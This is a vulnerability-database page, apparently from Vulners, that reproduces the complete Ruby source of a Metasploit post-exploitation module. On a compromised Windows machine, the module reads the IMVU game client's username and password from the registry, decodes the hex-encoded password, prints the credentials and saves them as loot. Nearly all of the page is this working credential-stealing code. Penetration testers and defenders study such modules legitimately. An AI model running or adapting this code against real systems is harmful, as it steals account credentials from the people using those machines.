Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

Windows Gather Credentials IMVU Game Client

🗓️ 01 Nov 2011 21:06:50Reported by Shubham Dawra <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 46 Views

Windows Gather Credentials IMVU Game Client. Extracts account username & password from IMVU game client and stores as loot

Show more
Code
# -*- coding: binary -*-

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Credentials IMVU Game Client',
        'Description' => %q{
          This module extracts account username & password from the IMVU game client
          and stores it as loot.
        },
        'Author' => [
          'Shubham Dawra <shubham2dawra[at]gmail.com>' # www.SecurityXploded.com
        ],
        'License' => MSF_LICENSE,
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ]
      )
    )
  end

  def run
    creds = Rex::Text::Table.new(
      'Header' => 'IMVU Credentials',
      'Indent' => 1,
      'Columns' => [
        'User',
        'Password'
      ]
    )

    credcount = 0
    userhives = load_missing_hives
    userhives.each do |hive|
      next if hive['HKU'].nil?

      vprint_status("Looking at Key #{hive['HKU']}")
      subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\IMVU\\")
      if subkeys.nil? || subkeys.empty?
        print_status('IMVU not installed for this user.')
        next
      end
      user = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\username\\", '')
      hpass = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\password\\", '')
      decpass = [ hpass.downcase.gsub(/'/, '').gsub(/\\?x([a-f0-9][a-f0-9])/, '\1') ].pack('H*')
      print_good("User=#{user}, Password=#{decpass}")
      creds << [user, decpass]
      credcount = (credcount + 1)
    end

    # clean up after ourselves
    unload_our_hives(userhives)
    print_status("#{credcount} Credentials were found.")

    if credcount > 0
      print_status('Storing data...')
      path = store_loot(
        'imvu.user.creds',
        'text/csv',
        session,
        creds.to_csv,
        'imvu_user_creds.csv',
        'IMVU User Credentials'
      )
      print_good("IMVU user credentials saved in: #{path}")
    end
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Nov 2011 21:50Current
0.7Low risk
Vulners AI Score0.7
windowsgathercredentialsimvu game clientaccountusernamepasswordlootuser profilesregistrymetasploitmeterpreter.
46
.json
Report